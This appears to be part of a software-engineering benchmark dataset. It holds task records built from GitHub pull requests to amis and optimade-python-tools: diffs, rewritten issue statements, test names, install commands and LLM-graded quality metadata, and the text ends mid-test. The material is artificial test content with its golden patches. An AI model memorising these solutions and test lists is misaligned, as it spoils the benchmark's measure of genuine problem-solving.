&["spec-var-name"]}', {})).toBe('you are right'); + expect(evaluate('${ls: &["c"]["c"]}', {})).toMatchObject({d: 4}); + expect(evaluate('${ls: &["c"][key]}', {})).toMatchObject({d: 4}); +});
[ "evalute:namespace", "async-evalute:namespace" ]
[ "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "evalute:Math", "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
No new interfaces are introduced.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 6, "num_modified_lines": 95, "pr_author": "2betop", "pr_labels": [ "feat" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2d72bdead8afa0798d18995311992d684348a694c2d5e214e8e4d2b6153e4821L8-R9", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-7ae45ad102eab3b6d7e7896acd08c427a9b25b346470d7bc6507b6481575d519L7-R7", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2461f3811423634aee38270e1d12bcf581b95eb845cb00a3ea5eae804a57795cL3-R3", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2461f3811423634aee38270e1d12bcf581b95eb845cb00a3ea5eae804a57795cL49-R49", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2a1582dd8536cd65b762f9cd79719e90b98bdc38b808db0aaf783039f53d4153L3-R3", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-0e30bcb7b6942e615a81bbcc87d75a7279e22d52e521bd61e050c056f6efe78cL6-R6", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-0e30bcb7b6942e615a81bbcc87d75a7279e22d52e521bd61e050c056f6efe78cL39-R40", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-b49028542a3bb14de6e47e46a9f09f23ffeff3afea2a17d5ddace75726a33e12L3-R3", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-b49028542a3bb14de6e47e46a9f09f23ffeff3afea2a17d5ddace75726a33e12L40-R41" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests support for accessing cookie, localStorage, and sessionStorage via namespace syntax and handling complex variable names using &[...] syntax. The provided test patch verifies these behaviors, and the golden patch implements the necessary evaluator logic and helper adjustments, aligning with the stated requirements. No signals of missing specs, external dependencies, or naming expectations are present, so the task is well‑defined and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
983b98f9573e1bc58602bb78ea31d87d3ce829a0
2024-06-13 20:29:57
codecov[bot]: ## [Codecov](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2097?dropdown=coverage&src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report All modified and coverable lines are covered by tests :white_check_mark: > Project coverage is 90.70%. Comparing base [(`983b98f`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/983b98f9573e1bc58602bb78ea31d87d3ce829a0?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) to head [(`bbd43a2`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/bbd43a2734b82b3fcd222010dd47b4d1b5628d51?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). <details><summary>Additional details and impacted files</summary> ```diff @@ Coverage Diff @@ ## master #2097 +/- ## ======================================= Coverage 90.69% 90.70% ======================================= Files 75 75 Lines 4740 4743 +3 ======================================= + Hits 4299 4302 +3 Misses 441 441 ``` | [Flag](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2097/flags?src=pr&el=flags&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [project](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2097/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.70% <100.00%> (+<0.01%)` | :arrow_up: | | [validator](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2097/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `?` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. </details> [:umbrella: View full report in Codecov by Sentry](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2097?dropdown=coverage&src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). :loudspeaker: Have feedback on the report? [Share it here](https://about.codecov.io/codecov-pr-comment-feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia).
materials-consortia__optimade-python-tools-2097
diff --git a/openapi/openapi.json b/openapi/openapi.json index c5f1a39e..11eb639e 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -1664,8 +1664,10 @@ "description": "Description of the entry." }, "properties": { - "additionalProperties": { - "$ref": "#/components/schemas/EntryInfoProperty" + "patternProperties": { + "^[a-z_][a-z_0-9]+$": { + "$ref": "#/components/schemas/EntryInfoProperty" + } }, "type": "object", "title": "Properties", @@ -1674,7 +1676,8 @@ "output_fields_by_format": { "additionalProperties": { "items": { - "type": "string" + "type": "string", + "pattern": "^[a-z_][a-z_0-9]+$" }, "type": "array" }, diff --git a/optimade/models/entries.py b/optimade/models/entries.py index 8728a7af..414b4dde 100644 --- a/optimade/models/entries.py +++ b/optimade/models/entries.py @@ -8,6 +8,7 @@ from optimade.models.optimade_json import ( BaseRelationshipResource, DataType, Relationship, + ValidIdentifier, ) from optimade.models.utils import OptimadeField, StrictField, SupportLevel @@ -226,14 +227,14 @@ class EntryInfoResource(BaseModel): description: Annotated[str, StrictField(description="Description of the entry.")] properties: Annotated[ - dict[str, EntryInfoProperty], + dict[ValidIdentifier, EntryInfoProperty], StrictField( description="A dictionary describing queryable properties for this entry type, where each key is a property name.", ), ] output_fields_by_format: Annotated[ - dict[str, list[str]], + dict[str, list[ValidIdentifier]], StrictField( description="Dictionary of available output fields for this entry type, where the keys are the values of the `formats` list and the values are the keys of the `properties` dictionary.", ), diff --git a/optimade/models/optimade_json.py b/optimade/models/optimade_json.py index 348cb904..1aace40e 100644 --- a/optimade/models/optimade_json.py +++ b/optimade/models/optimade_json.py @@ -4,11 +4,11 @@ from datetime import datetime from enum import Enum from typing import Annotated, Any, Literal, Optional, Union -from pydantic import BaseModel, ConfigDict, EmailStr, model_validator +from pydantic import BaseModel, ConfigDict, EmailStr, Field, model_validator from optimade.models import jsonapi from optimade.models.types import SemanticVersion -from optimade.models.utils import StrictField +from optimade.models.utils import IDENTIFIER_REGEX, StrictField __all__ = ( "DataType", @@ -25,6 +25,9 @@ __all__ = ( "Relationship", ) +ValidIdentifier = Annotated[str, Field(pattern=IDENTIFIER_REGEX)] +"""A type that constrains strings to valid OPTIMADE identifiers (e.g., property names, ID strings).""" + class DataType(Enum): """Optimade Data types diff --git a/optimade/models/utils.py b/optimade/models/utils.py index 50349e3d..44f3109c 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -26,6 +26,7 @@ OPTIMADE_SCHEMA_EXTENSION_KEYS = ["support", "queryable", "unit", "sortable"] OPTIMADE_SCHEMA_EXTENSION_PREFIX = "x-optimade-" SEMVER_PATTERN = r"^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$" +IDENTIFIER_REGEX = r"^[a-z_][a-z_0-9]+$" class SupportLevel(Enum):
Validate property names against identifier regular expression This PR implements property name validation against identifier regular expression as laid out in OPTIMADE specification.
**Title** Enforce OPTIMADE identifier rules for property and field names **Problem** Clients could supply arbitrary strings as property names or output‑field identifiers, which violates the OPTIMADE specification that mandates a specific identifier pattern. This leads to non‑conforming APIs and potential downstream failures. **Root Cause** The data models and OpenAPI definitions used unrestricted string keys, lacking any pattern validation for identifiers. **Fix / Expected Behavior** - Introduce a dedicated identifier type that enforces the official regex pattern. - Apply this type to all dictionary keys representing property names and output‑field identifiers. - Update the OpenAPI schema to use `patternProperties` and `pattern` constraints reflecting the identifier regex. - Validation now rejects any property or field name that does not match the required pattern, raising clear errors. **Risk & Validation** - May reject existing datasets that contain non‑conforming identifiers; verify compatibility or migration paths. - Ensure that model validation and OpenAPI generation correctly propagate the new constraints through unit and integration tests. - Run the full test suite to confirm no unintended breakage in other parts of the library.
2,097
Materials-Consortia/optimade-python-tools
diff --git a/tests/models/test_baseinfo.py b/tests/models/test_baseinfo.py index 6d24a116..49d9bd52 100644 --- a/tests/models/test_baseinfo.py +++ b/tests/models/test_baseinfo.py @@ -2,6 +2,7 @@ import pytest from pydantic import ValidationError from optimade.models.baseinfo import AvailableApiVersion +from optimade.models.entries import EntryInfoResource def test_available_api_versions(): @@ -57,3 +58,34 @@ def test_available_api_versions(): for data in good_combos: assert isinstance(AvailableApiVersion(**data), AvailableApiVersion) + + +def test_good_entry_info_custom_properties(): + test_good_info = { + "formats": ["json", "xml"], + "description": "good info data", + "output_fields_by_format": {"json": ["nelements", "id"]}, + "properties": { + "nelements": {"description": "num elements", "type": "integer"}, + "_custom_field": {"description": "good custom field", "type": "string"}, + }, + } + assert EntryInfoResource(**test_good_info) + + +def test_bad_entry_info_custom_properties(): + """Checks that error is raised if custom field contains upper case letter.""" + test_bad_info = { + "formats": ["json", "xml"], + "description": "bad info data", + "output_fields_by_format": {"json": ["nelements", "id"]}, + "properties": { + "nelements": {"description": "num elements", "type": "integer"}, + "_custom_Field": {"description": "bad custom field", "type": "string"}, + }, + } + with pytest.raises( + ValueError, + match=".*[type=string_pattern_mismatch, input_value='_custom_Field', input_type=str].*", + ): + EntryInfoResource(**test_bad_info)
[ "tests/models/test_baseinfo.py::test_bad_entry_info_custom_properties" ]
[ "tests/models/test_baseinfo.py::test_available_api_versions", "tests/models/test_baseinfo.py::test_good_entry_info_custom_properties" ]
Method: EntryInfoResource.__init__(self, formats: list[str], description: str, output_fields_by_format: dict[str, list[ValidIdentifier]], properties: dict[ValidIdentifier, EntryInfoProperty]) Location: optimade.models.entries Inputs: - **formats** – list of supported format strings (e.g., “json”, “xml”). - **description** – free‑text description of the entry type. - **output_fields_by_format** – mapping from each format name to a list of property identifiers that are valid output fields; each identifier must match the OPTIMADE identifier regex `^[a-z_][a-z_0-9]+$` (including leading underscores). - **properties** – dictionary whose keys are property identifiers (constrained by the same regex) and whose values are `EntryInfoProperty` objects describing each property. Outputs: Returns a validated `EntryInfoResource` instance. Raises `ValueError` (wrapped by Pydantic as a validation error) when any identifier in `output_fields_by_format` or `properties` does not satisfy the identifier pattern. Description: Constructs a validated entry‑info resource model, enforcing that all custom property names and referenced output fields conform to the OPTIMADE identifier regular expression.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/models/test_baseinfo.py" }
{ "num_modified_files": 4, "num_modified_lines": 15, "pr_author": "merkys", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue asks for property name validation against the OPTIMADE identifier regex. The added tests verify that a valid custom property passes and that a property with an uppercase letter raises a ValueError, matching the intended behavior. The tests directly reflect the specification without referencing external resources or implicit naming expectations, so there are no B‑category problems. Therefore the task is clearly defined and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
ce04b39d8a6488b9220f0a8f23f55e09886205fa
2024-10-30 11:20:48
codecov[bot]: ## [Codecov](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?dropdown=coverage&src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report Attention: Patch coverage is `48.00000%` with `13 lines` in your changes missing coverage. Please review. > Project coverage is 90.65%. Comparing base [(`ccc8b64`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/ccc8b64fb844fac9b93a137438e4e32074b0770b?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) to head [(`7ff086e`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/7ff086e316f4ecc3752559c156db61f7069c1c97?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). | [Files with missing lines](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?dropdown=coverage&src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Patch % | Lines | |---|---|---| | [optimade/utils.py](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?src=pr&el=tree&filepath=optimade%2Futils.py&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvdXRpbHMucHk=) | 50.00% | [9 Missing :warning: ](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | | [optimade/server/entry\_collections/mongo.py](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?src=pr&el=tree&filepath=optimade%2Fserver%2Fentry_collections%2Fmongo.py&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvc2VydmVyL2VudHJ5X2NvbGxlY3Rpb25zL21vbmdvLnB5) | 40.00% | [3 Missing :warning: ](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | | [...made/server/entry\_collections/entry\_collections.py](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?src=pr&el=tree&filepath=optimade%2Fserver%2Fentry_collections%2Fentry_collections.py&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvc2VydmVyL2VudHJ5X2NvbGxlY3Rpb25zL2VudHJ5X2NvbGxlY3Rpb25zLnB5) | 50.00% | [1 Missing :warning: ](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | <details><summary>Additional details and impacted files</summary> ```diff @@ Coverage Diff @@ ## main #2175 +/- ## ========================================== - Coverage 90.80% 90.65% -0.16% ========================================== Files 75 75 Lines 4819 4836 +17 ========================================== + Hits 4376 4384 +8 - Misses 443 452 +9 ``` | [Flag](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175/flags?src=pr&el=flags&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [project](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.65% <48.00%> (-0.16%)` | :arrow_down: | | [validator](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.65% <48.00%> (-0.16%)` | :arrow_down: | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. </details> [:umbrella: View full report in Codecov by Sentry](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?dropdown=coverage&src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). :loudspeaker: Have feedback on the report? [Share it here](https://about.codecov.io/codecov-pr-comment-feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). ml-evs: I'm going to merge, can potentially backport these changes to 1.1.x but not super important, otherwise will wait for 1.2.x release
materials-consortia__optimade-python-tools-2175
diff --git a/optimade/server/config.py b/optimade/server/config.py index 29ba11a1..7b56469c 100644 --- a/optimade/server/config.py +++ b/optimade/server/config.py @@ -180,6 +180,16 @@ class ServerConfig(BaseSettings): ), ] = None + create_default_index: Annotated[ + bool, + Field( + description=( + "Whether to create a set of default indices " + "for supporting databases after inserting JSONL data." + ) + ), + ] = False + use_real_mongo: Annotated[ bool | None, Field(description="DEPRECATED: force usage of MongoDB over any other backend."), diff --git a/optimade/server/entry_collections/elasticsearch.py b/optimade/server/entry_collections/elasticsearch.py index 7b0fffc7..5bc52016 100644 --- a/optimade/server/entry_collections/elasticsearch.py +++ b/optimade/server/entry_collections/elasticsearch.py @@ -48,14 +48,19 @@ class ElasticCollection(EntryCollection): self.client = client if client else CLIENT self.name = name - # If we are creating a new collection from scratch, also create the index, - # otherwise assume it has already been created externally - if CONFIG.insert_test_data: - self.create_optimade_index() - def count(self, *args, **kwargs) -> int: raise NotImplementedError + def create_default_index(self) -> None: + """Create the default index for the collection. + + For Elastic, the default is to create a search index + over all relevant OPTIMADE fields based on the configured + mapper. + + """ + return self.create_optimade_index() + def create_optimade_index(self) -> None: """Load or create an index that can handle aliased OPTIMADE fields and attach it to the current client. @@ -111,7 +116,7 @@ class ElasticCollection(EntryCollection): """Returns the total number of entries in the collection.""" return Search(using=self.client, index=self.name).execute().hits.total.value - def insert(self, data: list[EntryResource]) -> None: + def insert(self, data: list[EntryResource | dict]) -> None: """Add the given entries to the underlying database. Warning: diff --git a/optimade/server/entry_collections/entry_collections.py b/optimade/server/entry_collections/entry_collections.py index 308842ce..caa4593f 100644 --- a/optimade/server/entry_collections/entry_collections.py +++ b/optimade/server/entry_collections/entry_collections.py @@ -119,11 +119,16 @@ class EntryCollection(ABC): """Returns the total number of entries in the collection.""" @abstractmethod - def insert(self, data: list[EntryResource]) -> None: + def insert(self, data: list[EntryResource | dict]) -> None: """Add the given entries to the underlying database. + Warning: + No validation is performed on the incoming data, this data + should have been mapped to the appropriate format before + insertion. + Arguments: - data: The entry resource objects to add to the database. + data: The entries to add to the database. """ @@ -274,6 +279,30 @@ class EntryCollection(ABC): return self._all_fields + def create_index(self, field: str, unique: bool = False) -> None: + """Create an index on the given field, as stored in the database. + + Arguments: + field: The database field to index (i.e., if different from the OPTIMADE field, + the mapper should be used to convert between the two). + unique: Whether or not the index should be unique. + + """ + raise NotImplementedError + + def create_default_index(self) -> None: + """Create the default index for the collection. + + For example, a database backend could override this method to + create a unique index on the `id` field, so that it can be called + on server startup. + + This method should use a mapper to convert any OPTIMADE field names + to the corresponding stored names in the database. + + """ + raise NotImplementedError + def get_attribute_fields(self) -> set[str]: """Get the set of attribute fields diff --git a/optimade/server/entry_collections/mongo.py b/optimade/server/entry_collections/mongo.py index 77d2c694..6740f6a5 100644 --- a/optimade/server/entry_collections/mongo.py +++ b/optimade/server/entry_collections/mongo.py @@ -91,17 +91,43 @@ class MongoCollection(EntryCollection): except ExecutionTimeout: return None - def insert(self, data: list[EntryResource]) -> None: + def insert(self, data: list[EntryResource | dict]) -> None: """Add the given entries to the underlying database. Warning: - No validation is performed on the incoming data. + No validation is performed on the incoming data, this data + should have been mapped to the appropriate format before + insertion. Arguments: - data: The entry resource objects to add to the database. + data: The entries to add to the database. """ - self.collection.insert_many(data) + self.collection.insert_many(data, ordered=False) + + def create_index(self, field: str, unique: bool = False) -> None: + """Create an index on the given field, as stored in the database. + + If any error is raised during index creation, this method should faithfully + return it, except for the simple case where an identical index already exists. + + Arguments: + field: The database field to index (i.e., if different from the OPTIMADE field, + the mapper should be used to convert between the two). + unique: Whether or not the index should be unique. + + """ + self.collection.create_index(field, unique=unique, background=True) + + def create_default_index(self) -> None: + """Create the default index for the collection. + + For MongoDB, the default is to create a unique index + on the `id` field. This method should obey any configured + mappers. + + """ + self.create_index(self.resource_mapper.get_backend_field("id"), unique=True) def handle_query_params( self, params: EntryListingQueryParams | SingleEntryQueryParams diff --git a/optimade/server/main.py b/optimade/server/main.py index f563f365..74f770ea 100644 --- a/optimade/server/main.py +++ b/optimade/server/main.py @@ -123,7 +123,7 @@ if CONFIG.insert_test_data or CONFIG.insert_from_jsonl: f"Requested JSONL file does not exist: {jsonl_path}. Please specify an absolute group." ) - insert_from_jsonl(jsonl_path) + insert_from_jsonl(jsonl_path, create_default_index=CONFIG.create_default_index) LOGGER.debug("Inserted data from JSONL file: %s", jsonl_path) if CONFIG.insert_test_data: diff --git a/optimade/utils.py b/optimade/utils.py index 45829726..306bb327 100644 --- a/optimade/utils.py +++ b/optimade/utils.py @@ -7,7 +7,6 @@ import contextlib import json from collections.abc import Container, Iterable from pathlib import Path -from traceback import print_exc from typing import TYPE_CHECKING, Optional from requests.exceptions import SSLError @@ -25,17 +24,19 @@ PROVIDER_LIST_URLS = ( ) -def insert_from_jsonl(jsonl_path: Path) -> None: +def insert_from_jsonl(jsonl_path: Path, create_default_index: bool = False) -> None: """Insert OPTIMADE JSON lines data into the database. Arguments: jsonl_path: Path to the JSON lines file. + create_default_index: Whether to create a default index on the `id` field. """ from collections import defaultdict import bson.json_util + from optimade.server.logger import LOGGER from optimade.server.routers import ENTRY_COLLECTIONS batch = defaultdict(list) @@ -50,6 +51,16 @@ def insert_from_jsonl(jsonl_path: Path) -> None: ) jsonl_path = _jsonl_path + # If the chosen database backend supports it, make the default indices + if create_default_index: + for entry_type in ENTRY_COLLECTIONS: + try: + ENTRY_COLLECTIONS[entry_type].create_default_index() + except NotImplementedError: + pass + + bad_rows: int = 0 + good_rows: int = 0 with open(jsonl_path) as handle: header = handle.readline() header_jsonl = json.loads(header) @@ -57,12 +68,19 @@ def insert_from_jsonl(jsonl_path: Path) -> None: "x-optimade" ), "No x-optimade header, not sure if this is a JSONL file" - for json_str in handle: + for line_no, json_str in enumerate(handle): try: - entry = bson.json_util.loads(json_str) + if json_str.strip(): + entry = bson.json_util.loads(json_str) + else: + LOGGER.warning("Could not read any data from L%s", line_no) + bad_rows += 1 + continue except json.JSONDecodeError: - print(f"Could not read entry as JSON: {json_str}") - print_exc() + from optimade.server.logger import LOGGER + + LOGGER.warning("Could not read entry L%s JSON: '%s'", line_no, json_str) + bad_rows += 1 continue try: id = entry.get("id", None) @@ -76,19 +94,26 @@ def insert_from_jsonl(jsonl_path: Path) -> None: # Append the data to the batch batch[_type].append(inp_data) except Exception as exc: - print(f"Error with entry {entry}: {exc}") - print_exc() + LOGGER.warning(f"Error with entry at L{line_no} -- {entry} -- {exc}") + bad_rows += 1 continue if len(batch[_type]) >= batch_size: ENTRY_COLLECTIONS[_type].insert(batch[_type]) batch[_type] = [] + good_rows += 1 + # Insert any remaining data for entry_type in batch: ENTRY_COLLECTIONS[entry_type].insert(batch[entry_type]) batch[entry_type] = [] + if bad_rows: + LOGGER.warning("Could not read %d rows from the JSONL file", bad_rows) + + LOGGER.info("Inserted %d rows from the JSONL file", good_rows) + def mongo_id_for_database(database_id: str, database_type: str) -> str: """Produce a MongoDB ObjectId for a database"""
Quality of life changes around JSONL & MongoDB - Better error handling and logging on JSONL insert - Parallel inserts from MongoDB - Convenience methods and config for creating indexes: nothing changes by default, but indexes can now be made when inserting from JSONL data.
**Title** Add optional default index creation and improve robustness of JSONL data ingestion **Problem** Loading JSONL files could fail silently on malformed lines and did not automatically create required database indexes, leading to potential duplicate‑key errors and sub‑optimal query performance. **Root Cause** The ingestion routine assumed all rows were valid and the backend collections lacked a generic way to create needed indexes, especially a unique index on the identifier field. **Fix / Expected Behavior** - Introduce a server configuration flag that, when enabled, creates backend‑specific default indexes (e.g., unique `id` index) before JSONL insertion. - Extend the collection abstraction with methods for creating arbitrary and default indexes, with concrete implementations for supported back‑ends. - Refactor JSONL loading to: * Skip empty lines and log them. * Catch and log JSON parsing errors without aborting the whole import. * Continue inserting remaining records using unordered bulk operations. * Report counts of successfully inserted and failed rows. - Preserve existing behavior when the new flag is disabled. **Risk & Validation** - Verify that automatic index creation does not clash with existing user‑defined indexes. - Ensure unordered bulk inserts correctly handle duplicate or problematic records across all back‑ends. - Run integration tests that feed both well‑formed and malformed JSONL files, checking that logs reflect accurate row counts and that the database contains the expected entries.
2,175
Materials-Consortia/optimade-python-tools
diff --git a/tests/server/entry_collections/test_indexes.py b/tests/server/entry_collections/test_indexes.py new file mode 100644 index 00000000..006bf2e8 --- /dev/null +++ b/tests/server/entry_collections/test_indexes.py @@ -0,0 +1,40 @@ +import pytest +from bson import ObjectId + +from optimade.server.config import CONFIG + + +@pytest.mark.skipif( + CONFIG.database_backend.value not in ("mongomock", "mongodb"), + reason="Skipping index test when testing the elasticsearch backend.", +) +def test_indexes_are_created_where_appropriate(client): + """Test that with the test config, default indices are made by + supported backends. This is tested by checking that we cannot insert + an entry with the same underlying ID as the test data, and that this + returns the appopriate database-specific error. + + """ + import pymongo.errors + + from optimade.server.query_params import EntryListingQueryParams + from optimade.server.routers import ENTRY_COLLECTIONS + + # get one structure with and try to reinsert it + for _type in ENTRY_COLLECTIONS: + result, _, _, _, _ = ENTRY_COLLECTIONS[_type].find( + EntryListingQueryParams(page_limit=1) + ) + assert result is not None + if isinstance(result, list): + result = result[0] + + # The ID is mapped to the test data ID (e.g., 'task_id'), so the index is actually on that + id_field = 